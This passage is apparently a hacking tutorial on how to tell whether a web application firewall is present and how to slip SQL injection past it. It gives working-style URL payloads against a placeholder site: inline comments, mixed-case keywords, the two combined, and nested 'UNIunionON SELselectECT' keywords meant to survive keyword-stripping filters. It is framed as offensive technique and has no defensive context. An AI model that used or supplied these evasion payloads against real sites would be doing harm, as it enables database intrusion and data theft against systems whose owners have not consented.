How to know if there is a Web Appli

How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:

http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
(We get a 403 Error!)

Basic/Simple Methods:
First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:
You can use comments to bypass WAF:

http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
(First Method that can Bypass WAF)

However, most WAF identify this method so they still show a “Forbidden” Error…

2) Change the Case of the Letters:
You can also change the Case of the Command:

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
(Another Basic Method to Bypass WAF!)

However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:
What you can also do is to combine the previous two methods:

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls!
4) Replaced Keywords:
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:

http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT”